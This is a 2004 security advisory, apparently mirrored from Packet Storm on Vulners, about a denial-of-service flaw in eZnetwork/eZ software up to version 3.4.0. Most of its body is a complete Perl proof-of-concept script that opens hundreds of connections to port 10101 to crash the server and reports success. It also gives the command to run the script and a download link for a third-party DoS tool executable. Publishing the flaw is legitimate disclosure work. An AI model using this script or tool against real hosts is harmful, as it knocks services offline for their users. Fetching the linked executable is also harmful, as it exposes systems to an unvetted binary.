Lucene search
K

ez.txt

🗓️ 09 Sep 2004 00:00:00Reported by Dr. InsaneType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 30 Views

Eznetwork vulnerability allows denial of service, impacting versions 3.4.0 and prior.

Code
`  
Security Advisory  
  
  
  
Vulnerability: Eznetwork multiple connections Denial of service  
Packages : "eZ34.exe" and "eZphoto1.2.1.EXE"  
+ eZ  
+ eZphotoshare  
+ eZmeeting  
+ eZnetwork  
+ eZshare  
Software : www.eZmeeting.com  
[version 3.4.0]  
eZnet Modules:  
SwServer: 1.153  
SwEzModule.dll: 1.72  
SwLoginModule.dll: 1.94  
SwMetaObjectModule.dll: 1.46  
SwProxyModule.dll: 1.35  
SwShareModule.dll: 1.90  
SwStatusModule.dll: 1.41  
SwTransferModule.dll: 1.172  
  
Version : 3.4.0 and prior  
Vendor : eZnetwork  
Vendor Url : http://www.ezmeeting.com/Products.html  
Bug Type : Denial of service attack  
Severity : Medium--->remote crash  
Severity : medium  
Author: dr_insane , [email protected]  
  
  
#################################################  
  
#################################################  
  
1. Description  
  
eZ:  
---  
"Imagine going to the movies, but instead of seeing the picture, someone had to  
describe it to you verbally. That's what's happening in countless business  
discussions and conference calls every day. A lot of time and money is being  
wasted. That's why we created eZ. Now imagine having the ability to  
place any document right in front of the person you’re speaking with on the  
phone, immediately - Word, Excel, PowerPoint, PDF, CAD, Digital Photos. Online.  
Real time. That's the power of eZ. Regardless of the distance that separates  
your team, eZ delivers an amazingly interactive, simple, visual workspace for  
all team players. If a picture paints a thousand words, think what an  
interactive picture can do for your business. Picture it with eZ."  
- Vendor's Description  
  
eZnetwork:  
----------  
"eZnetwork is a service that works hand in hand with the eZ desktop application.  
It allows users to connect with others (outside their Local Area Network) over  
the Internet, by using an eZ identity, or 'Friendly Name'. eZnetwork also allows  
users to host conferences and join conferences, even when one or more  
participants are located behind corporate firewalls, without compromising  
security."  
- Vendor's Description  
  
eZphotoshare:  
-------------  
"eZphotoshare is an amazing new way to share Digital Photos over the Internet  
with friends and family. Seeing is believing, download it today and  
interactively share digital photos anytime, anywhere. It's FREE for home use."  
- Vendor's Description  
  
  
2. Vulnerability Details  
The vulnerability is caused due to an error in the connection handling, which can be exploited to crash the   
server by establishing about 600 connections to 10101 port.  
  
By executing the following code against Ez.exe (port 10101) the server will crash:  
  
-----------------------------------------------------------------  
  
"C:\Perl\bin\perl5.6.1.exe "C:\kill_ez.pl" 127.0.0.1 10101 600" |  
  
-----------------------------------------------------------------  
  
#!/usr/bin/perl  
  
use Strict;   
use Socket;  
use IO::Socket;  
  
my $host = $ARGV[0];  
my $port = $ARGV[1];  
my $stop = $ARGV[2];  
my $size = 1000;  
my $prot = getprotobyname('tcp');  
my $slep = $ARGV[3];  
  
printf("================================================\n");  
printf(" Eznetwork POC \n");  
printf("================================================\n");  
printf("[*] Making %d Connections To %s \n", $stop , $host);  
  
for ($i=1; $i<$stop; $i++)  
{  
socket($i, PF_INET, SOCK_STREAM, $prot );   
my $dest = sockaddr_in ($port, inet_aton($host));  
connect($i, $dest);  
}  
  
CheckServer($host, $i, $slep, $stop);  
KillThreads($stop);  
printf("[*] Exploit Attempt Unsuccesful");  
exit;  
  
sub CheckServer($host, $i, $slep, $stop) {  
($host, $i, $slep, $stop) = @_;  
$blank = "\015\012" x 2;  
$request = "GET / HTTP/1.0".$blank;  
$remote = IO::Socket::INET->new( Proto => "tcp",  
PeerAddr => $host,  
PeerPort => $port,  
Timeout => '10000',  
Type => SOCK_STREAM,  
);   
print $remote $request;  
unless ( <$remote> )  
{  
printf("[*] Host %s Has Been Successfully DoS'ed\n", $host);  
printf("[*] The Host Will Be Down For %d Seconds\n", $slep);  
sleep($slep);  
KillThreads($stop);  
exit;  
}  
}  
  
sub KillThreads($stop) {  
$stop = @_;  
printf("[*] Killing All active Connections");  
for ($l=1; $l<$stop; $l++) {  
shutdown($l,2)|| die("Couldn't Shut Down Socket");  
$l++;  
}  
}  
  
  
If you don't want to use this code you can download g0dzilla to test it:   
http://members.lycos.co.uk/r34ct/main/godzillaDosTool/upgrade_to_v02.exe  
  
  
Workaround:  
User another product  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation